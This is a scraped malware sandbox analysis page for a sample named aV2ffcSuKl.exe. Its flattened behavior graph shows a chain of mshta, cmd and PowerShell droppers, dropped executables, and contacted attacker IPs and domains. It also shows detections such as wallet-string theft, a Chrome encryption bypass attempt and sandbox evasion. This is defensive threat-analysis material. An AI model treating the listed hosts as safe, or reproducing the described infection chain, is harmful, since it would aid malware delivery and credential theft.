                                                Mshta                                                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                                                Behavior Graph

                                                Hide Legend

                                                Legend:

                                                • Process
                                                • Signature
                                                • Created File
                                                • DNS/IP Info
                                                • Is Dropped
                                                • Is Windows Process
                                                • Number of created Registry Values
                                                • Number of created Files
                                                • Visual Basic
                                                • Delphi
                                                • Java
                                                • .Net C# or VB.NET
                                                • C, C++ or other language
                                                • Is malicious
                                                • Internet
                                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1630726 Sample: aV2ffcSuKl.exe Startdate: 06/03/2025 Architecture: WINDOWS Score: 100 137 185.156.73.73 RELDAS-NETRU Russian Federation 2->137 139 towerbingobongoboom.com 2->139 141 904 other IPs or domains 2->141 171 Suricata IDS alerts for network traffic 2->171 173 Found malware configuration 2->173 175 Malicious sample detected (through community Yara rule) 2->175 177 30 other signatures 2->177 10 rapes.exe 2->10         started        15 aV2ffcSuKl.exe 1 2->15         started        17 Gxtuum.exe 2->17         started        19 8 other processes 2->19 signatures3 process4 dnsIp5 153 smtp.wmconnect.com 10->153 155 out.glomedvn.com 10->155 111 C:\Users\user\AppData\...\df2fea7261.exe, PE32 10->111 dropped 113 C:\Users\user\AppData\...\c70962c806.exe, PE32 10->113 dropped 115 C:\Users\user\AppData\...\5ef8bafe70.exe, PE32 10->115 dropped 125 21 other malicious files 10->125 dropped 239 Contains functionality to start a terminal service 10->239 241 Creates multiple autostart registry keys 10->241 243 Hides threads from debuggers 10->243 257 2 other signatures 10->257 21 ILqcVeT.exe 10->21         started        26 132fd7f0ed.exe 10->26         started        28 rXOl0pp.exe 10->28         started        38 3 other processes 10->38 117 C:\Users\user\AppData\Local\...\sGwBNuRjx.hta, HTML 15->117 dropped 245 Binary is likely a compiled AutoIt script file 15->245 247 Found API chain indicative of sandbox detection 15->247 249 Creates HTA files 15->249 30 mshta.exe 1 15->30         started        32 cmd.exe 1 15->32         started        119 C:\Users\user\AppData\...\vertualiziren.exe, PE32 17->119 dropped 121 C:\Users\user\...\vertualiziren[1].exe, PE32 17->121 dropped 34 vertualiziren.exe 17->34         started        157 towerbingobongoboom.com 213.209.150.137 KEMINETAL Germany 19->157 159 lajahotiere.fr 185.230.63.107 WIX_COMIL Israel 19->159 161 115 other IPs or domains 19->161 123 C:\Users\user\AppData\Local\...\1lEt3ife9.hta, HTML 19->123 dropped 251 Antivirus detection for dropped file 19->251 253 Multi AV Scanner detection for dropped file 19->253 255 Suspicious powershell command line found 19->255 259 2 other signatures 19->259 36 powershell.exe 16 19->36         started        40 4 other processes 19->40 file6 signatures7 process8 dnsIp9 143 38.180.229.217, 49762, 80 COGENT-174US United States 21->143 107 14 other malicious files 21->107 dropped 193 Detected unpacking (changes PE section rights) 21->193 195 Attempt to bypass Chrome Application-Bound Encryption 21->195 209 5 other signatures 21->209 54 2 other processes 21->54 93 C:\Users\user\AppData\Local\...\rKRHHhiYP.hta, HTML 26->93 dropped 211 2 other signatures 26->211 42 mshta.exe 26->42         started        45 cmd.exe 26->45         started        95 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 28->95 dropped 97 C:\Users\user\AppData\...\softokn3[1].dll, PE32 28->97 dropped 99 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 28->99 dropped 109 3 other malicious files 28->109 dropped 213 3 other signatures 28->213 197 Suspicious powershell command line found 30->197 199 Tries to download and execute files (via powershell) 30->199 47 powershell.exe 15 19 30->47         started        201 Uses schtasks.exe or at.exe to add and modify task schedules 32->201 57 2 other processes 32->57 101 C:\ProgramData\jnxnee\benskvi.exe, PE32 34->101 dropped 215 2 other signatures 34->215 50 TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE 36->50         started        52 conhost.exe 36->52         started        103 C:\Users\user\AppData\Local\...behaviorgraphxtuum.exe, PE32 38->103 dropped 105 C:\Temp\plDCQRtK9.hta, HTML 38->105 dropped 203 Multi AV Scanner detection for dropped file 38->203 205 Contains functionality to start a terminal service 38->205 217 5 other signatures 38->217 59 8 other processes 38->59 207 Suspicious execution chain found 40->207 61 5 other processes 40->61 file10 signatures11 process12 dnsIp13 219 Suspicious powershell command line found 42->219 221 Tries to download and execute files (via powershell) 42->221 63 powershell.exe 42->63         started        80 2 other processes 45->80 127 TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, PE32 47->127 dropped 223 Found many strings related to Crypto-Wallets (likely being stolen) 47->223 225 Powershell drops PE file 47->225 66 TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE 4 47->66         started        69 conhost.exe 47->69         started        227 Contains functionality to start a terminal service 50->227 229 Hides threads from debuggers 50->229 231 Tries to detect sandboxes / dynamic malware analysis system (registry check) 50->231 145 239.255.255.250 unknown Reserved 54->145 233 Monitors registry run keys for changes 54->233 71 chrome.exe 54->71         started        74 msedge.exe 54->74         started        235 Multi AV Scanner detection for dropped file 59->235 76 powershell.exe 59->76         started        82 3 other processes 59->82 129 TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE, PE32 61->129 dropped 237 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 61->237 78 conhost.exe 61->78         started        file14 signatures15 process16 dnsIp17 131 TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, PE32 63->131 dropped 84 TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE 63->84         started        87 conhost.exe 63->87         started        133 C:\Users\user\AppData\Local\...\rapes.exe, PE32 66->133 dropped 163 Detected unpacking (changes PE section rights) 66->163 165 Contains functionality to start a terminal service 66->165 167 Tries to evade debugger and weak emulator (self modifying code) 66->167 169 4 other signatures 66->169 89 rapes.exe 66->89         started        147 142.250.181.228 GOOGLEUS United States 71->147 149 www.google.com 71->149 151 post.cz 71->151 135 C:\Users\...\483d2fa8a0d53818306efeb32d3.exe, PE32 76->135 dropped 91 conhost.exe 76->91         started        file18 signatures19 process20 signatures21 179 Tries to evade debugger and weak emulator (self modifying code) 84->179 181 Hides threads from debuggers 84->181 183 Tries to detect sandboxes / dynamic malware analysis system (registry check) 84->183 185 Detected unpacking (changes PE section rights) 89->185 187 Contains functionality to start a terminal service 89->187 189 Creates HTML files with .exe extension (expired dropper behavior) 89->189 191 2 other signatures 89->191

                                                Screenshots

                                                Thumbnails

                                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.